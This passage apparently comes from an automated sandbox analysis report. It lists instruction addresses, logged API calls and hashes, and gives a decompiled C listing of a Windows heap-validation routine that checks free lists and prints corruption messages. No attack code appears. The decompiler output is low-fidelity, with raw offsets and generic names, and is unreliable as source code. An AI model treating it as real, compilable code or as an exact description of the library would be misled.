				goto L88;
			}



































































                                                                                                                            0x6b294af7
                                                                                                                            0x6b294afb
                                                                                                                            0x6b294afd
                                                                                                                            0x6b294b01
                                                                                                                            0x6b294b03
                                                                                                                            0x6b294b08
                                                                                                                            0x6b294b0a
                                                                                                                            0x6b294b0f
                                                                                                                            0x6b294eb5
                                                                                                                            0x6b294eb5
                                                                                                                            0x6b294ebb
                                                                                                                            0x6b2950d5
                                                                                                                            0x6b2950d8
                                                                                                                            0x6b294ff6
                                                                                                                            0x00000000
                                                                                                                            0x6b294ff6
                                                                                                                            0x6b2950de
                                                                                                                            0x6b2950e4
                                                                                                                            0x6b2950e8
                                                                                                                            0x6b295107
                                                                                                                            0x6b29510c
                                                                                                                            0x6b2950ea
                                                                                                                            0x6b2950ff
                                                                                                                            0x6b295104
                                                                                                                            0x6b295112
                                                                                                                            0x6b295115
                                                                                                                            0x6b295118
                                                                                                                            0x6b295119
                                                                                                                            0x6b2950cb
                                                                                                                            0x6b2950cb
                                                                                                                            0x6b2950af
                                                                                                                            0x00000000
                                                                                                                            0x6b2950af
                                                                                                                            0x6b294ecb
                                                                                                                            0x6b2950b6
                                                                                                                            0x6b2950bb
                                                                                                                            0x6b294ed1
                                                                                                                            0x6b294ee6
                                                                                                                            0x6b294eeb
                                                                                                                            0x6b2950c1
                                                                                                                            0x6b2950c2
                                                                                                                            0x6b2950c5
                                                                                                                            0x6b2950c6
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b294b15
                                                                                                                            0x6b294b15
                                                                                                                            0x6b294b1c
                                                                                                                            0x6b294b1e
                                                                                                                            0x6b294b23
                                                                                                                            0x6b294b27
                                                                                                                            0x6b294b33
                                                                                                                            0x6b294b38
                                                                                                                            0x6b294b3a
                                                                                                                            0x6b294b3c
                                                                                                                            0x6b294b41
                                                                                                                            0x6b294b41
                                                                                                                            0x6b294b3a
                                                                                                                            0x6b294b52
                                                                                                                            0x6b295045
                                                                                                                            0x6b29504b
                                                                                                                            0x6b29504f
                                                                                                                            0x6b29506e
                                                                                                                            0x6b295073
                                                                                                                            0x6b295051
                                                                                                                            0x6b295066
                                                                                                                            0x6b29506b
                                                                                                                            0x6b295083
                                                                                                                            0x6b295088
                                                                                                                            0x6b295088
                                                                                                                            0x6b29508a
                                                                                                                            0x6b295091
                                                                                                                            0x6b295099
                                                                                                                            0x6b295099
                                                                                                                            0x6b29509d
                                                                                                                            0x6b2950a7
                                                                                                                            0x6b2950ad
                                                                                                                            0x6b2950ad
                                                                                                                            0x6b2950ad
                                                                                                                            0x00000000
                                                                                                                            0x6b29509d
                                                                                                                            0x6b294b58
                                                                                                                            0x6b294b5b
                                                                                                                            0x6b294b5e
                                                                                                                            0x6b294b63
                                                                                                                            0x6b294b66
                                                                                                                            0x6b294b69
                                                                                                                            0x6b294b6f
                                                                                                                            0x6b294be4
                                                                                                                            0x6b294bf0
                                                                                                                            0x6b294bf2
                                                                                                                            0x6b294bf5
                                                                                                                            0x6b294dc3
                                                                                                                            0x6b294dc6
                                                                                                                            0x6b294dc9
                                                                                                                            0x6b294dce
                                                                                                                            0x6b294dce
                                                                                                                            0x6b294dd0
                                                                                                                            0x6b294dd0
                                                                                                                            0x6b294dd5
                                                                                                                            0x6b294def
                                                                                                                            0x6b294dd7
                                                                                                                            0x6b294de7
                                                                                                                            0x6b294de7
                                                                                                                            0x6b294df3
                                                                                                                            0x6b295001
                                                                                                                            0x6b295007
                                                                                                                            0x6b29500b
                                                                                                                            0x6b29502a
                                                                                                                            0x6b29502f
                                                                                                                            0x6b29500d
                                                                                                                            0x6b295022
                                                                                                                            0x6b295027
                                                                                                                            0x6b295039
                                                                                                                            0x6b29503a
                                                                                                                            0x6b29503b
                                                                                                                            0x00000000
                                                                                                                            0x6b294df9
                                                                                                                            0x6b294dfd
                                                                                                                            0x6b294e90
                                                                                                                            0x6b294e94
                                                                                                                            0x6b294e9e
                                                                                                                            0x6b294ea4
                                                                                                                            0x6b294ea4
                                                                                                                            0x6b294ea4
                                                                                                                            0x6b294ea6
                                                                                                                            0x6b294ea6
                                                                                                                            0x00000000
                                                                                                                            0x6b294ea6
                                                                                                                            0x6b294e03
                                                                                                                            0x6b294e08
                                                                                                                            0x6b294f88
                                                                                                                            0x6b294f92
                                                                                                                            0x6b294f99
                                                                                                                            0x6b294f9c
                                                                                                                            0x6b294fe0
                                                                                                                            0x6b294fe4
                                                                                                                            0x6b294fee
                                                                                                                            0x6b294ff4
                                                                                                                            0x6b294ff4
                                                                                                                            0x6b294ff4
                                                                                                                            0x00000000
                                                                                                                            0x6b294fe4
                                                                                                                            0x6b294f9e
                                                                                                                            0x6b294fa4
                                                                                                                            0x6b294fa8
                                                                                                                            0x6b294fc7
                                                                                                                            0x6b294fcc
                                                                                                                            0x6b294faa
                                                                                                                            0x6b294fbf
                                                                                                                            0x6b294fc4
                                                                                                                            0x6b294fd2
                                                                                                                            0x6b294fd5
                                                                                                                            0x6b294fd6
                                                                                                                            0x6b294f34
                                                                                                                            0x6b294f34
                                                                                                                            0x00000000
                                                                                                                            0x6b294f39
                                                                                                                            0x6b294e0e
                                                                                                                            0x6b294e14
                                                                                                                            0x6b294e1b
                                                                                                                            0x6b294e25
                                                                                                                            0x6b294e2b
                                                                                                                            0x6b294e2b
                                                                                                                            0x6b294e33
                                                                                                                            0x6b294e38
                                                                                                                            0x6b294e8a
                                                                                                                            0x6b294e8a
                                                                                                                            0x00000000
                                                                                                                            0x6b294e3a
                                                                                                                            0x6b294e3e
                                                                                                                            0x6b294e43
                                                                                                                            0x6b294e47
                                                                                                                            0x6b294e53
                                                                                                                            0x6b294e58
                                                                                                                            0x6b294e5a
                                                                                                                            0x6b294e5c
                                                                                                                            0x6b294e61
                                                                                                                            0x6b294e61
                                                                                                                            0x6b294e5a
                                                                                                                            0x6b294e6e
                                                                                                                            0x6b294f41
                                                                                                                            0x6b294f47
                                                                                                                            0x6b294f4b
                                                                                                                            0x6b294f6a
                                                                                                                            0x6b294f6f
                                                                                                                            0x6b294f4d
                                                                                                                            0x6b294f62
                                                                                                                            0x6b294f67
                                                                                                                            0x6b294f7f
                                                                                                                            0x6b294f80
                                                                                                                            0x6b294f81
                                                                                                                            0x00000000
                                                                                                                            0x6b294e74
                                                                                                                            0x6b294e78
                                                                                                                            0x6b294e82
                                                                                                                            0x6b294e88
                                                                                                                            0x6b294e88
                                                                                                                            0x00000000
                                                                                                                            0x6b294e78
                                                                                                                            0x6b294e6e
                                                                                                                            0x6b294e38
                                                                                                                            0x6b294df3
                                                                                                                            0x6b294bfe
                                                                                                                            0x6b294c01
                                                                                                                            0x6b294c04
                                                                                                                            0x6b294c07
                                                                                                                            0x6b294c09
                                                                                                                            0x6b294c0c
                                                                                                                            0x6b294c0e
                                                                                                                            0x6b294c0e
                                                                                                                            0x6b294c11
                                                                                                                            0x6b294c11
                                                                                                                            0x6b294c0c
                                                                                                                            0x6b294c14
                                                                                                                            0x6b294c17
                                                                                                                            0x6b294dae
                                                                                                                            0x6b294db2
                                                                                                                            0x6b294db7
                                                                                                                            0x6b294dba
                                                                                                                            0x6b294dbd
                                                                                                                            0x6b294ef1
                                                                                                                            0x6b294ef7
                                                                                                                            0x6b294efb
                                                                                                                            0x6b294f1a
                                                                                                                            0x6b294f1f
                                                                                                                            0x6b294efd
                                                                                                                            0x6b294f12
                                                                                                                            0x6b294f17
                                                                                                                            0x6b294f2b
                                                                                                                            0x6b294f2b
                                                                                                                            0x6b294f2d
                                                                                                                            0x6b294f2e
                                                                                                                            0x6b294f2f
                                                                                                                            0x00000000
                                                                                                                            0x6b294f2f
                                                                                                                            0x00000000
                                                                                                                            0x6b294c1d
                                                                                                                            0x6b294c1d
                                                                                                                            0x6b294c20
                                                                                                                            0x6b294c23
                                                                                                                            0x6b294c26
                                                                                                                            0x6b294c29
                                                                                                                            0x6b294c2c
                                                                                                                            0x6b294c2e
                                                                                                                            0x6b294d91
                                                                                                                            0x6b294d91
                                                                                                                            0x6b294d92
                                                                                                                            0x6b294d97
                                                                                                                            0x6b294d9e
                                                                                                                            0x00000000
                                                                                                                            0x6b294d9e
                                                                                                                            0x6b294c34
                                                                                                                            0x6b294c37
                                                                                                                            0x6b294c39
                                                                                                                            0x6b294c3c
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b294c45
                                                                                                                            0x6b294c48
                                                                                                                            0x6b294c4e
                                                                                                                            0x6b294c50
                                                                                                                            0x6b294c78
                                                                                                                            0x6b294c78
                                                                                                                            0x6b294c7b
                                                                                                                            0x6b294c7d
                                                                                                                            0x6b294c80
                                                                                                                            0x6b294c84
                                                                                                                            0x6b294cad
                                                                                                                            0x6b294cad
                                                                                                                            0x6b294cb0
                                                                                                                            0x6b294cb8
                                                                                                                            0x6b294cbb
                                                                                                                            0x6b294cbe
                                                                                                                            0x6b294cc1
                                                                                                                            0x6b294cc7
                                                                                                                            0x6b294cdc
                                                                                                                            0x6b294cc9
                                                                                                                            0x6b294cd2
                                                                                                                            0x6b294cd4
                                                                                                                            0x6b294cd4
                                                                                                                            0x6b294cde
                                                                                                                            0x6b294ce0
                                                                                                                            0x6b294d13
                                                                                                                            0x6b294d13
                                                                                                                            0x6b294d16
                                                                                                                            0x6b294d18
                                                                                                                            0x6b294d29
                                                                                                                            0x6b294d2a
                                                                                                                            0x6b294d2c
                                                                                                                            0x6b294d34
                                                                                                                            0x6b294d1a
                                                                                                                            0x6b294d1a
                                                                                                                            0x6b294d1a
                                                                                                                            0x6b294d1d
                                                                                                                            0x6b294d1f
                                                                                                                            0x6b294d22
                                                                                                                            0x6b294d24
                                                                                                                            0x6b294d24
                                                                                                                            0x6b294d3c
                                                                                                                            0x6b294d3f
                                                                                                                            0x6b294d45
                                                                                                                            0x6b294d47
                                                                                                                            0x6b294d6c
                                                                                                                            0x6b294d6c
                                                                                                                            0x6b294d70
                                                                                                                            0x6b294d7e
                                                                                                                            0x6b294d84
                                                                                                                            0x6b294d84
                                                                                                                            0x00000000
                                                                                                                            0x6b294d49
                                                                                                                            0x6b294d49
                                                                                                                            0x6b294d56
                                                                                                                            0x6b294d56
                                                                                                                            0x6b294d59
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b294d4e
                                                                                                                            0x6b294d50
                                                                                                                            0x6b294d52
                                                                                                                            0x6b294d8e
                                                                                                                            0x6b294d5d
                                                                                                                            0x6b294d5f
                                                                                                                            0x6b294d67
                                                                                                                            0x00000000
                                                                                                                            0x6b294d67
                                                                                                                            0x6b294d54
                                                                                                                            0x6b294d54
                                                                                                                            0x6b294d5b
                                                                                                                            0x00000000
                                                                                                                            0x6b294d5b
                                                                                                                            0x6b294ce2
                                                                                                                            0x6b294ce2
                                                                                                                            0x6b294ce5
                                                                                                                            0x6b294ce5
                                                                                                                            0x6b294ce7
                                                                                                                            0x6b294cfb
                                                                                                                            0x6b294ce9
                                                                                                                            0x6b294ce9
                                                                                                                            0x6b294cec
                                                                                                                            0x6b294cef
                                                                                                                            0x6b294cf1
                                                                                                                            0x6b294cf3
                                                                                                                            0x6b294cf3
                                                                                                                            0x6b294cf3
                                                                                                                            0x6b294cf6
                                                                                                                            0x6b294cf6
                                                                                                                            0x6b294d02
                                                                                                                            0x6b294d05
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b294d07
                                                                                                                            0x6b294d0f
                                                                                                                            0x6b294d11
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b294d11
                                                                                                                            0x00000000
                                                                                                                            0x6b294ce5
                                                                                                                            0x6b294ce0
                                                                                                                            0x6b294c8a
                                                                                                                            0x6b294c8f
                                                                                                                            0x6b294c91
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b294c9d
                                                                                                                            0x00000000
                                                                                                                            0x6b294c9d
                                                                                                                            0x6b294c52
                                                                                                                            0x6b294c5f
                                                                                                                            0x6b294c5f
                                                                                                                            0x6b294c62
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b294c57
                                                                                                                            0x6b294c59
                                                                                                                            0x6b294c5b
                                                                                                                            0x6b294caa
                                                                                                                            0x6b294c66
                                                                                                                            0x6b294c68
                                                                                                                            0x6b294c70
                                                                                                                            0x6b294c75
                                                                                                                            0x00000000
                                                                                                                            0x6b294c75
                                                                                                                            0x6b294c5d
                                                                                                                            0x6b294c5d
                                                                                                                            0x6b294c64
                                                                                                                            0x00000000
                                                                                                                            0x6b294c64
                                                                                                                            0x6b294c17
                                                                                                                            0x6b294b75
                                                                                                                            0x6b294bc4
                                                                                                                            0x6b294bc8
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b294bd9
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b294b77
                                                                                                                            0x6b294b7a
                                                                                                                            0x6b294b8c
                                                                                                                            0x6b294b7c
                                                                                                                            0x6b294b7e
                                                                                                                            0x6b294b83
                                                                                                                            0x6b294b86
                                                                                                                            0x6b294b86
                                                                                                                            0x6b294b90
                                                                                                                            0x6b294b93
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b294b95
                                                                                                                            0x6b294bab
                                                                                                                            0x6b294bb0
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b294bb2
                                                                                                                            0x6b294bb9
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b294bbb
                                                                                                                            0x6b294bbe
                                                                                                                            0x6b294bc1
                                                                                                                            0x6b294bc1
                                                                                                                            0x00000000
                                                                                                                            0x6b294bc1
                                                                                                                            0x6b294b97
                                                                                                                            0x6b294ba4
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b294ba6
                                                                                                                            0x00000000
                                                                                                                            0x6b294ba6
                                                                                                                            0x6b294ea9
                                                                                                                            0x6b294ea9
                                                                                                                            0x6b294eb2
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • RtlCompareMemoryUlong.1105(-00000008,?,FEEEFEEE), ref: 6B294DB2
                                                                                                                            • DbgPrint.1105(HEAP[%wZ]: ,-0000002C,-00000008,?,?), ref: 6B294EE6
                                                                                                                            • DbgPrint.1105(HEAP[%wZ]: ,-0000002C,-00000008,?,FEEEFEEE), ref: 6B294F12
                                                                                                                            • DbgPrint.1105(HEAP: ,-00000008,?,FEEEFEEE), ref: 6B294F1F
                                                                                                                            • DbgPrint.1105(Heap block at %p is not last block in segment (%p),-00000018,?), ref: 6B294F34
                                                                                                                            • DbgPrint.1105(HEAP[%wZ]: ,-0000002C), ref: 6B294F62
                                                                                                                            • DbgPrint.1105(HEAP: ), ref: 6B294F6F
                                                                                                                            • DbgPrint.1105(HEAP[%wZ]: ,-0000002C), ref: 6B294FBF
                                                                                                                            • DbgPrint.1105(HEAP: ), ref: 6B294FCC
                                                                                                                            • DbgPrint.1105(HEAP[%wZ]: ,-0000002C), ref: 6B295022
                                                                                                                            • DbgPrint.1105(HEAP: ), ref: 6B29502F
                                                                                                                            • DbgPrint.1105(HEAP[%wZ]: ,-0000002C), ref: 6B295066
                                                                                                                            • DbgPrint.1105(HEAP: ), ref: 6B295073
                                                                                                                            • DbgPrint.1105(Heap entry %p has incorrect PreviousSize field (%04x instead of %04x),-00000018,?,?), ref: 6B295091
                                                                                                                            • DbgPrint.1105(HEAP: ,-00000008,?,?), ref: 6B2950BB
                                                                                                                            • DbgPrint.1105(Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x),?,00000000,?,-00000008,?,?), ref: 6B2950CB
                                                                                                                            • DbgPrint.1105(HEAP[%wZ]: ,-0000002C,-00000008,?,?), ref: 6B2950FF
                                                                                                                            • DbgPrint.1105(HEAP: ,-00000008,?,?), ref: 6B29510C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: Print$CompareMemoryUlong
                                                                                                                            • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                                                                            • API String ID: 2560481200-3591852110
                                                                                                                            • Opcode ID: 7609efeff0e135fe5526ee3a68474d3aacf84bcae8ea8e7a2c63e9a8012720d9
                                                                                                                            • Instruction ID: b52ad36dae1be5a22930ad8eedc81bc9246790eabd012eb20cf896b7f3c2cc3c
                                                                                                                            • Opcode Fuzzy Hash: 7609efeff0e135fe5526ee3a68474d3aacf84bcae8ea8e7a2c63e9a8012720d9
                                                                                                                            • Instruction Fuzzy Hash: FC12F23061064AEFD725EF2AD494BB6B7F1EF09705F048499E4B98B681D73CE881CB60
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B294496, Relevance: 45.9, APIs: 18, Strings: 8, Instructions: 417memorynativeCOMMONCrypto
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 55%
                                                                                                                            			E6B294496(signed int* __ecx, void* __edx) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed char _v24;
				signed int* _v28;
				char _v32;
				signed int* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t150;
				intOrPtr _t151;
				signed char _t156;
				intOrPtr _t157;
				unsigned int _t169;
				intOrPtr _t170;
				signed int* _t183;
				signed char _t184;
				intOrPtr _t191;
				signed int _t201;
				intOrPtr _t203;
				intOrPtr _t212;
				intOrPtr _t220;
				signed int _t230;
				signed int _t241;
				signed int _t244;
				void* _t259;
				signed int _t260;
				signed int* _t261;
				intOrPtr* _t262;
				signed int _t263;
				signed int* _t264;
				signed int _t267;
				signed int* _t268;
				void* _t270;
				void* _t281;
				signed short _t285;
				signed short _t289;
				signed int _t291;
				signed int _t298;
				signed char _t303;
				signed char _t308;
				signed int _t314;
				intOrPtr _t317;
				unsigned int _t319;
				signed int* _t325;
				signed int _t326;
				signed int _t327;
				intOrPtr _t328;
				signed int _t329;
				signed int _t330;
				signed int* _t331;
				signed int _t332;
				signed int _t350;

				_t259 = __edx;
				_t331 = __ecx;
				_v28 = __ecx;
				_v20 = 0;
				_v12 = 0;
				_t150 = E6B2949A4(__ecx);
				_t267 = 1;
				if(_t150 == 0) {
					L61:
					_t151 =  *[fs:0x30];
					__eflags =  *((char*)(_t151 + 2));
					if( *((char*)(_t151 + 2)) != 0) {
						 *0x6b2c6378 = _t267;
						asm("int3");
						 *0x6b2c6378 = 0;
					}
					__eflags = _v12;
					if(_v12 != 0) {
						_t105 =  &_v16;
						 *_t105 = _v16 & 0x00000000;
						__eflags =  *_t105;
						E6B20174B( &_v12,  &_v16, 0x8000);
					}
					L65:
					__eflags = 0;
					return 0;
				}
				if(_t259 != 0 || (__ecx[0x10] & 0x20000000) != 0) {
					_t268 =  &(_t331[0x30]);
					_v32 = 0;
					_t260 =  *_t268;
					_t308 = 0;
					_v24 = 0;
					while(_t268 != _t260) {
						_t260 =  *_t260;
						_v16 =  *_t325 & 0x0000ffff;
						_t156 = _t325[0];
						_v28 = _t325;
						_v5 = _t156;
						__eflags = _t156 & 0x00000001;
						if((_t156 & 0x00000001) != 0) {
							_t157 =  *[fs:0x30];
							__eflags =  *(_t157 + 0xc);
							if( *(_t157 + 0xc) == 0) {
								_push("HEAP: ");
								E6B1DB150();
							} else {
								E6B1DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_t325);
							E6B1DB150("dedicated (%04Ix) free list element %p is marked busy\n", _v16);
							L32:
							_t270 = 0;
							__eflags = _t331[0x13];
							if(_t331[0x13] != 0) {
								_t325[0] = _t325[0] ^ _t325[0] ^  *_t325;
								 *_t325 =  *_t325 ^ _t331[0x14];
							}
							L60:
							_t267 = _t270 + 1;
							__eflags = _t267;
							goto L61;
						}
						_t169 =  *_t325 & 0x0000ffff;
						__eflags = _t169 - _t308;
						if(_t169 < _t308) {
							_t170 =  *[fs:0x30];
							__eflags =  *(_t170 + 0xc);
							if( *(_t170 + 0xc) == 0) {
								_push("HEAP: ");
								E6B1DB150();
							} else {
								E6B1DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							E6B1DB150("Non-Dedicated free list element %p is out of order\n", _t325);
							goto L32;
						} else {
							__eflags = _t331[0x13];
							_t308 = _t169;
							_v24 = _t308;
							if(_t331[0x13] != 0) {
								_t325[0] = _t169 >> 0x00000008 ^ _v5 ^ _t308;
								 *_t325 =  *_t325 ^ _t331[0x14];
								__eflags =  *_t325;
							}
							_t26 =  &_v32;
							 *_t26 = _v32 + 1;
							__eflags =  *_t26;
							continue;
						}
					}
					_v16 = 0x208 + (_t331[0x21] & 0x0000ffff) * 4;
					if( *0x6b2c6350 != 0 && _t331[0x2f] != 0) {
						_push(4);
						_push(0x1000);
						_push( &_v16);
						_push(0);
						_push( &_v12);
						_push(0xffffffff);
						if(E6B219660() >= 0) {
							_v20 = _v12 + 0x204;
						}
					}
					_t183 =  &(_t331[0x27]);
					_t281 = 0x81;
					_t326 =  *_t183;
					if(_t183 == _t326) {
						L49:
						_t261 =  &(_t331[0x29]);
						_t184 = 0;
						_t327 =  *_t261;
						_t282 = 0;
						_v24 = 0;
						_v36 = 0;
						__eflags = _t327 - _t261;
						if(_t327 == _t261) {
							L53:
							_t328 = _v32;
							_v28 = _t331;
							__eflags = _t328 - _t184;
							if(_t328 == _t184) {
								__eflags = _t331[0x1d] - _t282;
								if(_t331[0x1d] == _t282) {
									__eflags = _v12;
									if(_v12 == 0) {
										L82:
										_t267 = 1;
										__eflags = 1;
										goto L83;
									}
									_t329 = _t331[0x2f];
									__eflags = _t329;
									if(_t329 == 0) {
										L77:
										_t330 = _t331[0x22];
										__eflags = _t330;
										if(_t330 == 0) {
											L81:
											_t129 =  &_v16;
											 *_t129 = _v16 & 0x00000000;
											__eflags =  *_t129;
											E6B20174B( &_v12,  &_v16, 0x8000);
											goto L82;
										}
										_t314 = _t331[0x21] & 0x0000ffff;
										_t285 = 1;
										__eflags = 1 - _t314;
										if(1 >= _t314) {
											goto L81;
										} else {
											goto L79;
										}
										while(1) {
											L79:
											_t330 = _t330 + 0x40;
											_t332 = _t285 & 0x0000ffff;
											_t262 = _v20 + _t332 * 4;
											__eflags =  *_t262 -  *((intOrPtr*)(_t330 + 8));
											if( *_t262 !=  *((intOrPtr*)(_t330 + 8))) {
												break;
											}
											_t285 = _t285 + 1;
											__eflags = _t285 - _t314;
											if(_t285 < _t314) {
												continue;
											}
											goto L81;
										}
										_t191 =  *[fs:0x30];
										__eflags =  *(_t191 + 0xc);
										if( *(_t191 + 0xc) == 0) {
											_push("HEAP: ");
											E6B1DB150();
										} else {
											E6B1DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_t262);
										_push( *((intOrPtr*)(_v20 + _t332 * 4)));
										_push( *((intOrPtr*)(_t330 + 8)));
										_push(_t330 + 0x10);
										E6B1DB150("Tag %04x (%ws) size incorrect (%Ix != %Ix) %p\n", _t332);
										L59:
										_t270 = 0;
										__eflags = 0;
										goto L60;
									}
									_t289 = 1;
									__eflags = 1;
									while(1) {
										_t201 = _v12;
										_t329 = _t329 + 0xc;
										_t263 = _t289 & 0x0000ffff;
										__eflags =  *((intOrPtr*)(_t201 + _t263 * 4)) -  *((intOrPtr*)(_t329 + 8));
										if( *((intOrPtr*)(_t201 + _t263 * 4)) !=  *((intOrPtr*)(_t329 + 8))) {
											break;
										}
										_t289 = _t289 + 1;
										__eflags = _t289 - 0x81;
										if(_t289 < 0x81) {
											continue;
										}
										goto L77;
									}
									_t203 =  *[fs:0x30];
									__eflags =  *(_t203 + 0xc);
									if( *(_t203 + 0xc) == 0) {
										_push("HEAP: ");
										E6B1DB150();
									} else {
										E6B1DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									}
									_t291 = _v12;
									_push(_t291 + _t263 * 4);
									_push( *((intOrPtr*)(_t291 + _t263 * 4)));
									_push( *((intOrPtr*)(_t329 + 8)));
									E6B1DB150("Pseudo Tag %04x size incorrect (%Ix != %Ix) %p\n", _t263);
									goto L59;
								}
								_t212 =  *[fs:0x30];
								__eflags =  *(_t212 + 0xc);
								if( *(_t212 + 0xc) == 0) {
									_push("HEAP: ");
									E6B1DB150();
								} else {
									E6B1DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(_t331[0x1d]);
								_push(_v36);
								_push("Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)\n");
								L58:
								E6B1DB150();
								goto L59;
							}
							_t220 =  *[fs:0x30];
							__eflags =  *(_t220 + 0xc);
							if( *(_t220 + 0xc) == 0) {
								_push("HEAP: ");
								E6B1DB150();
							} else {
								E6B1DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_t328);
							_push(_v24);
							_push("Number of free blocks in arena (%ld) does not match number in the free lists (%ld)\n");
							goto L58;
						} else {
							goto L50;
						}
						while(1) {
							L50:
							_t92 = _t327 - 0x10; // -24
							_t282 = _t331;
							_t230 = E6B294AEF(_t331, _t92, _t331,  &_v24,  &_v36,  &_v28, _v20, _v12);
							__eflags = _t230;
							if(_t230 == 0) {
								goto L59;
							}
							_t327 =  *_t327;
							__eflags = _t327 - _t261;
							if(_t327 != _t261) {
								continue;
							}
							_t184 = _v24;
							_t282 = _v36;
							goto L53;
						}
						goto L59;
					} else {
						while(1) {
							_t39 = _t326 + 0x18; // 0x10
							_t264 = _t39;
							if(_t331[0x13] != 0) {
								_t319 = _t331[0x14] ^  *_t264;
								 *_t264 = _t319;
								_t303 = _t319 >> 0x00000010 ^ _t319 >> 0x00000008 ^ _t319;
								_t348 = _t319 >> 0x18 - _t303;
								if(_t319 >> 0x18 != _t303) {
									_push(_t303);
									E6B28FA2B(_t264, _t331, _t264, _t326, _t331, _t348);
								}
								_t281 = 0x81;
							}
							_t317 = _v20;
							if(_t317 != 0) {
								_t241 =  *(_t326 + 0xa) & 0x0000ffff;
								_t350 = _t241;
								if(_t350 != 0) {
									if(_t350 >= 0) {
										__eflags = _t241 & 0x00000800;
										if(__eflags == 0) {
											__eflags = _t241 - _t331[0x21];
											if(__eflags < 0) {
												_t298 = _t241;
												_t65 = _t317 + _t298 * 4;
												 *_t65 =  *(_t317 + _t298 * 4) + ( *(_t326 + 0x10) >> 3);
												__eflags =  *_t65;
											}
										}
									} else {
										_t244 = _t241 & 0x00007fff;
										if(_t244 < _t281) {
											 *((intOrPtr*)(_v12 + _t244 * 4)) =  *((intOrPtr*)(_v12 + _t244 * 4)) + ( *(_t326 + 0x10) >> 3);
										}
									}
								}
							}
							if(( *(_t326 + 0x1a) & 0x00000004) != 0 && E6B2823E3(_t331, _t264) == 0) {
								break;
							}
							if(_t331[0x13] != 0) {
								_t264[0] = _t264[0] ^ _t264[0] ^  *_t264;
								 *_t264 =  *_t264 ^ _t331[0x14];
							}
							_t326 =  *_t326;
							if( &(_t331[0x27]) == _t326) {
								goto L49;
							} else {
								_t281 = 0x81;
								continue;
							}
						}
						__eflags = _t331[0x13];
						if(_t331[0x13] != 0) {
							 *(_t326 + 0x1b) =  *(_t326 + 0x1a) ^  *(_t326 + 0x19) ^  *(_t326 + 0x18);
							 *(_t326 + 0x18) =  *(_t326 + 0x18) ^ _t331[0x14];
						}
						goto L65;
					}
				} else {
					L83:
					return _t267;
				}
			}



























































                                                                                                                            0x6b2944a1
                                                                                                                            0x6b2944a3
                                                                                                                            0x6b2944a7
                                                                                                                            0x6b2944ac
                                                                                                                            0x6b2944af
                                                                                                                            0x6b2944b2
                                                                                                                            0x6b2944b9
                                                                                                                            0x6b2944bc
                                                                                                                            0x6b2947f2
                                                                                                                            0x6b2947f2
                                                                                                                            0x6b2947f8
                                                                                                                            0x6b2947fc
                                                                                                                            0x6b2947fe
                                                                                                                            0x6b294804
                                                                                                                            0x6b294805
                                                                                                                            0x6b294805
                                                                                                                            0x6b29480c
                                                                                                                            0x6b294810
                                                                                                                            0x6b294812
                                                                                                                            0x6b294812
                                                                                                                            0x6b294812
                                                                                                                            0x6b294822
                                                                                                                            0x6b294822
                                                                                                                            0x6b294827
                                                                                                                            0x6b294827
                                                                                                                            0x00000000
                                                                                                                            0x6b294827
                                                                                                                            0x6b2944c4
                                                                                                                            0x6b2944d3
                                                                                                                            0x6b2944d9
